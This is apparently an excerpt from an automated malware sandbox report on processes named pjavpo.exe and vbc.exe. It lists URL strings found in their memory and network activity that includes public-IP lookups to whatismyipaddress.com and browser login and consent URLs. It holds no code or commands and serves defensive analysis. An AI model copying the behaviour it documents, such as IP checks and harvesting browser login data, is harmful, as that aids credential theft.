                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADv842.img?h=250&w=300
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvbPR.img?h=250&w=300
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvbce.img?h=333&w=311
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvhNP.img?h=333&w=311
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvoN9.img?h=166&w=310
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyXiwM.img?h=16&w=16&m
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyuliQ.img?h=16&w=16&m
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAzjSw3.img?h=16&w=16&m
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB16g6qc.img?h=27&w=27&
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17eTok.img?h=75&w=100
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB18T33l.img?h=166&w=31
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB18qTPD.img?h=16&w=16&
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19x3nX.img?h=166&w=31
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xGDT.img?h=333&w=31
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xJbM.img?h=75&w=100
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xaUu.img?h=166&w=31
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yF6n.img?h=333&w=31
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yKf2.img?h=250&w=30
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19ylKx.img?h=75&w=100
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yuvA.img?h=250&w=30
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19ywNG.img?h=75&w=100
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yxVU.img?h=166&w=31
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB46JmN.img?h=16&w=16&m
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB6Ma4a.img?h=16&w=16&m
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBMVUFn.img?h=16&w=16&m
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBO5Geh.img?h=16&w=16&m
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&m
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBRUB0d.img?h=16&w=16&m
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBVuddh.img?h=16&w=16&m
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBWoHwx.img?h=27&w=27&m
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&w=27&m
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBi9v6.img?m=6&o=true&u
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBih5H.img?m=6&o=true&u
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBkwUr.img?h=16&w=16&m=
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnYSFZ.img?h=16&w=16&m
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BByBEMv.img?h=16&w=16&m
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://support.google.com/accounts/answer/151657
                Source: pjavpo.exe, 00000005.00000002.493747770.0000000002801000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://whatismyipaddress.com
                Source: pjavpo.exe, pjavpo.exe, 00000005.00000002.493747770.0000000002801000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://whatismyipaddress.com/
                Source: pjavpo.exe, 00000003.00000002.246555259.00000000020E0000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.492406178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497729162.0000000004A22000.00000040.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497425736.0000000003801000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000000.244278596.0000000000414000.00000040.00000400.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497655109.0000000004990000.00000004.08000000.00040000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497590428.0000000004908000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://whatismyipaddress.com/-
                Source: pjavpo.exe, 00000005.00000002.499537073.0000000006202000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: pjavpo.exe, 00000005.00000003.267079423.0000000004F9E000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000003.266811417.0000000004F9E000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000003.267378958.0000000004F9E000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000003.266664691.0000000004F9E000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000003.267513923.0000000004F9E000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000003.266920825.0000000004F9E000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000003.267323200.0000000004F9E000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000003.266505711.0000000004F9E000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000003.267222556.0000000004F9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.ascendercorp.com/typedesigners.html
                Source: pjavpo.exe, 00000005.00000003.257544389.0000000004F9E000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000003.258100800.0000000004F9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.com
                Source: pjavpo.exe, 00000005.00000002.499537073.0000000006202000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                Source: pjavpo.exe, 00000005.00000003.258100800.0000000004F9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.commg
                Source: pjavpo.exe, 00000005.00000002.499537073.0000000006202000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                Source: pjavpo.exe, 00000005.00000002.499537073.0000000006202000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                Source: pjavpo.exe, 00000005.00000002.499537073.0000000006202000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                Source: pjavpo.exe, 00000005.00000002.499537073.0000000006202000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                Source: pjavpo.exe, 00000005.00000002.499537073.0000000006202000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                Source: pjavpo.exe, 00000005.00000002.499537073.0000000006202000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                Source: pjavpo.exe, 00000005.00000002.499537073.0000000006202000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                Source: pjavpo.exe, 00000005.00000002.499537073.0000000006202000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                Source: pjavpo.exe, 00000005.00000002.493470447.0000000000B37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com91S
                Source: pjavpo.exe, 00000005.00000002.493470447.0000000000B37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com=
                Source: pjavpo.exe, 00000005.00000002.493470447.0000000000B37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comlvfet21Z
                Source: pjavpo.exe, 00000005.00000002.493470447.0000000000B37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.como
                Source: pjavpo.exe, 00000005.00000002.499537073.0000000006202000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                Source: pjavpo.exe, 00000005.00000003.255679895.0000000004F7C000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000003.254164186.0000000004F9E000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000003.254335364.0000000004FA0000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.499537073.0000000006202000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                Source: pjavpo.exe, 00000005.00000002.499537073.0000000006202000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                Source: pjavpo.exe, 00000005.00000002.499537073.0000000006202000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                Source: pjavpo.exe, 00000005.00000003.255272980.0000000004F9E000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000003.255550167.0000000004F9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/rL
                Source: pjavpo.exe, 00000005.00000002.499537073.0000000006202000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                Source: pjavpo.exe, 00000005.00000003.277315069.0000000004F9E000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.499537073.0000000006202000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                Source: pjavpo.exe, 00000005.00000002.499537073.0000000006202000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://www.google.com/
                Source: pjavpo.exe, 00000005.00000002.499537073.0000000006202000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://www.msn.com
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://www.msn.com/
                Source: vbc.exe, 0000000D.00000003.327330830.0000000002215000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.323819201.0000000002215000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.326555994.000000000221A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.324135944.0000000002215000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.323582819.000000000221C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.324202827.0000000002215000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.323964619.0000000002215000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.325110381.000000000220D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.324363269.0000000002215000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.325212298.000000000221A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.326969363.0000000002215000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.327458849.000000000221A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.326870543.0000000002215000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.324885939.0000000002215000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.324652893.0000000002215000.00000004.00000800.00020000.00000000.sdmp, bhv8D09.tmp.13.drString found in binary or memory: http://www.msn.com/?ocid=iehp
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/consent/55a804
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-canary.png
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-dev.png
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-enterprise.png
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-bottom-left.png
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-middle.png
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-top-right.png
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_features.png
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_privacy.png
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_tools.png
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/laptop_desktop.png
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/chrome/static/images/thank-you/thankyou-animation.json
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/chrome/static/js/installer.min.js
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/chrome/static/js/main.v2.min.js
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/complete/search?q&cp=0&client=psy-ab&xssi=t&gs_ri=gws-wiz&hl=en&authuser=0&pq
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/complete/search?q&cp=0&client=psy-ab&xssi=t&gs_ri=gws-wiz&hl=en&authuser=0&ps
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/complete/search?q=c&cp=1&client=psy-ab&xssi=t&gs_ri=gws-wiz&hl=en&authuser=0&
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/complete/search?q=ch&cp=2&client=psy-ab&xssi=t&gs_ri=gws-wiz&hl=en&authuser=0
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/complete/search?q=chr&cp=3&client=psy-ab&xssi=t&gs_ri=gws-wiz&hl=en&authuser=
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/complete/search?q=chro&cp=4&client=psy-ab&xssi=t&gs_ri=gws-wiz&hl=en&authuser
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/complete/search?q=chrom&cp=5&client=psy-ab&xssi=t&gs_ri=gws-wiz&hl=en&authuse
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/complete/search?q=chrome&cp=6&client=psy-ab&xssi=t&gs_ri=gws-wiz&hl=en&authus
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/favicon.ico
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/images/branding/googlelogo/2x/googlelogo_color_272x92dp.png
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/images/branding/googlelogo/2x/googlelogo_color_92x30dp.png
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/images/hpp/Chrome_Owned_96x96.png
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/images/icons/material/system/1x/email_grey600_24dp.png
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/images/nav_logo299.png
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/images/phd/px.gif
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/images/searchbox/desktop_searchbox_sprites302_hr.png
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/intl/en_uk/chrome/
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/intl/en_uk/chrome/application/x-msdownloadC:
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/intl/en_uk/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrows
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/js/bg/4sIGg4Q0MrxdMwjTwsyJBGUAZbljSmH8-8Fa9_hVOC0.js
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/search
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/search?source=hp&ei=djJ0X6TKCL6IjLsPqriogAY&q=chrome&oq=chrome&gs_lcp=CgZwc3k
                Source: vbc.exe, 0000000D.00000003.324135944.0000000002215000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.325490889.000000000221A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.324202827.0000000002215000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.323964619.0000000002215000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.324363269.0000000002215000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.325212298.000000000221A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.324885939.0000000002215000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.324652893.0000000002215000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/searchp/LinkId=255141
                Source: vbc.exe, 0000000D.00000003.325110381.000000000220D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.323407346.000000000222A000.00000004.00000800.00020000.00000000.sdmp, bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=&ved=2ahUKEwj8k7G9rJDsAhWNTxUIHZZGDCQQ
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/xjs/_/js/k=xjs.s.en_GB.u8fwEfmm86E.O/ck=xjs.s.hyRG9kR79v8.L.I11.O/am=AAAAAABA
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/xjs/_/js/k=xjs.s.en_GB.u8fwEfmm86E.O/ck=xjs.s.hyRG9kR79v8.L.I11.O/m=IvlUe
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.googleadservices.com/pagead/conversion.js
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.googleadservices.com/pagead/conversion_async.js
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.googleadservices.com/pagead/p3p.xml
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=GTM-PZ6TRJB
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.gstatic.com/_/mss/boq-identity/_/js/k=boq-identity.ConsentUi.en_GB.wmTUy5P6FUM.es5.O/ck=
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.gstatic.com/_/mss/boq-one-google/_/js/k=boq-one-google.OneGoogleWidgetUi.en.bMYZ6MazNlM.
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.gstatic.com/ac/cb/cb_cbu_kickin.svg
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.gstatic.com/external_hosted/autotrack/autotrack.js
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.gstatic.com/external_hosted/lottie/lottie.js
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.gstatic.com/external_hosted/modernizr/modernizr.js
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.gstatic.com/external_hosted/scrollmagic/ScrollMagic.min.js
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.gstatic.com/external_hosted/scrollmagic/animation.gsap.min.js
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.gstatic.com/images/branding/googlelogo/1x/googlelogo_color_92x36dp.png
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/check_black_24dp.png
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/keyboard_arrow_down_grey600_24dp.png
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.gstatic.com/kpui/social/fb_32x32.png
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.gstatic.com/kpui/social/twitter_32x32.png
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.gstatic.com/og/_/js/k=og.og2.en_US.vA2d_upwXfg.O/rt=j/m=def
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.LGkrjG2a9yI.O/rt=j/m=qabr
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.CniBF78B8Ew.L.X.O/m=qcwid/excm=qaaw
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.gstatic.com/ui/v1/activityindicator/loading_24.gif
                Source: vbc.exe, 0000000D.00000003.325490889.000000000221A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.325673478.0000000002215000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.326155267.000000000221A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.325833599.0000000002215000.00000004.00000800.00020000.00000000.sdmp, bhv8D09.tmp.13.drString found in binary or memory: https://www.msn.com/
                Source: vbc.exe, 0000000D.00000003.325673478.0000000002215000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com//searchp/LinkId=255141
                Source: vbc.exe, 0000000D.00000003.328802653.00000000027E8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.327613810.00000000027E8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000002.332890748.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.332406171.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.332307194.00000000009EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/http://www.google.com/ms-appx-web://microsoft.microsoftedge/ms-appx-web://micros
                Source: vbc.exe, 0000000D.00000003.329277879.000000000221A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.328664768.000000000221A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.328857011.0000000002215000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.328998402.000000000221A000.00000004.00000800.00020000.00000000.sdmp, bhv8D09.tmp.13.drString found in binary or memory: https://www.msn.com/spartan/dhp?locale=en-US&market=US&enableregulatorypsm=0&enablecpsm=0&ishostisol
                Source: unknownDNS traffic detected: queries for: 63.155.11.0.in-addr.arpa
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 5_2_00B1B07E recv,
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 11 Mar 2022 10:56:40 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closePermissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTX-Frame-Options: SAMEORIGINExpect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"Set-Cookie: __cf_bm=0fu62l9a9_o52ZpSiY3B2Ubbqf8OPYGmRmWYhvH38y0-1646996200-0-AfArknz4ODut5S1R3Wyrv/QQodqXd6I1PPLa+MPUvKGZ6LT0rq7co6gxFQbkOapzHcyoZ6cbSHNSxTJdVa3eLOE=; path=/; expires=Fri, 11-Mar-22 11:26:40 GMT; domain=.whatismyipaddress.com; HttpOnly; SecureServer: cloudflareCF-RAY: 6ea3c3cbc8a66955-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                Source: vbc.exe, 0000000D.00000002.332890748.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.332406171.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.332307194.00000000009EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 9g1;~oref=https%3A%2F%2Fwww.google.com%2Fintl%2Fen_uk%2Fchrome%2Fres://C:\Windows\system32\mmcndmgr.dll/views.htmhttps://www.msn.com/http://www.google.com/ms-appx-web://microsoft.microsoftedge/ms-appx-web://microsoft.microsoftedge/assets/errorpages/dnserror.html?ErrorStatus=0x800C0005ms-appx-web://microsoft.microsoftedge/assets/errorpages/dnserror.htmlms-appx-web://microsoft.microsoftedge/assets/errorpages/dnserror.html?ErrorStatus=0x800C0005&DNSError=11001ms-appx-web://microsoft.microsoftedge/assets/errorpages/dnserror.html?ErrorStatus=0x800C0005&DNSError=10060https://login.live.com/me.srf?wa=wsignin1.0&wreply=https%3A%2F%2Fwww.microsoft.com&uaid=c5003367-537c-4bc6-f11c-743a85fd800b&partnerId=retailstore2https://login.live.com/me.srfhttps://login.live.com/me.srf?wa=wsignin1.0&wreply=https%3A%2F%2Fwww.microsoft.com&uaid=8dc8b1f5-b8c0-44ac-8df2-c841e5a6aeb1&partnerId=retailstore2https://www.microsoft.com/en-us/welcomeie11/welcomeie11https://www.microsoft.com/store/buy/cartcounthttp://cookies.onetrust.mgr.consensu.org/?name=euconsent&value=&expire=0&isFirstRequest=truehttp://cookies.onetrust.mgr.consensu.org/https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login%2F%2Fwww.google.com%2Fintl%2Fen_uk%2Fchrome%2Fhttps://consent.google.com/done8?continue=https://www.google.com/?gws_rd%3Dssl&origin=https://www.google.com&gl=GB&pc=s&uxe=4421591 equals www.facebook.com (Facebook)
